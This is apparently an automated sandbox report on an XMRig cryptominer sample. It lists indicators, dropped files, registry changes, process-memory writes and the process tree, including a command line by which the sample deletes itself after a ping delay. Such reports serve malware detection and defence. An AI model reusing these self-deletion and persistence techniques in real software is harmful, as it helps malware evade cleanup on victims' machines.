Malware Analysis Report

2025-01-22 12:22

Sample ID 240518-xhgqnaaa9y
Target 5646516f9069627c54a3878c3af85286_JaffaCakes118
SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9
Tags miner xmrig aspackv2
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9

Threat Level: Known bad

The file 5646516f9069627c54a3878c3af85286_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

miner xmrig aspackv2

xmrig

Xmrig family

XMRig Miner payload

ASPack v2.12-2.42

Checks computer location settings

Executes dropped EXE

Deletes itself

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-18 18:51

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-18 18:51

Reported

2024-05-18 18:53

Platform

win7-20240508-en

Max time kernel

146s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\TEMP\aEHvt.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\k2[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\k1[1].rar C:\Windows\TEMP\aEHvt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\updater.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\java.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Mail\wab.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdate.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Mail\wabmig.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\VPREVIEW.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Windows Mail\WinMail.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\misc.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\7-Zip\7zG.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Install\{5629EE71-1934-428C-A492-DBD2787497EC}\chrome_installer.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCICONS.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\National\National.exe

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-ff-bb-18-f6-f2\WpadDecision = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D25A5B7E-7C27-41B6-85A7-D7DFDF730D14} C:\Windows\TEMP\aEHvt.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D25A5B7E-7C27-41B6-85A7-D7DFDF730D14}\WpadDecisionReason = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\TEMP\aEHvt.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Microsoft\National\Nationa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2932 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2876 wrote to memory of 2584 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2932 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2168 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2876 wrote to memory of 2540 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2972 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1908 wrote to memory of 264 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 788 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1908 wrote to memory of 2280 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2984 wrote to memory of 2432 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2432 wrote to memory of 2240 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 1620 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 1544 wrote to memory of 324 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 2328 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe
PID 1544 wrote to memory of 1432 N/A C:\ProgramData\National\National.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c @ping -n 5 127.0.0.1&del C:\Users\Admin\AppData\Local\Temp\564651~1.EXE > nul

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 380

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\069f635f.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\2a5e5aa5.bat" "

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\49f92fd0.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\3b645e2c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1cc7346a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\26491afc.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\59b8415e.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\21372fea.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\30b94a85.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 276 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\50453d3e.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\55c033c4.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6f4b7274.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7ece0d0f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\605d77ce.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\69df5e60.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\516f7d28.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\22f60fc9.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0e8d1e9d.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\5c0c4132.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

